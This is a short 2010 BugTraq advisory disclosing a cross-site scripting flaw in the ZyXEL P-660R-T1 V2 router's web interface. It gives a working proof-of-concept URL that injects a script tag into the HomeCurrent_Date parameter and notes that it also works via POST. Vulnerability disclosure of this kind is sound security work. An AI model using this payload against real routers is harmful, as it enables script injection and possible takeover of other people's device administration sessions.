BugTraq
ZyXEL P-660R-T1 V2 XSS Nov 23 2010 12:32PM
Usman Saeed (usman xc0re net)
########################################################################
#############
#
# Name : ZyXEL P-660R-T1 V2 XSS
# Author : Usman Saeed from Xc0re Security Research Group
# Homepage :http://www.xc0re.net
# Dated : 22/11/2010
#
########################################################################
#############

Exploit:

VECTOR :http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01
%2F01%2F2000

This works with the post request ! As by default this value is sent through POST request.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus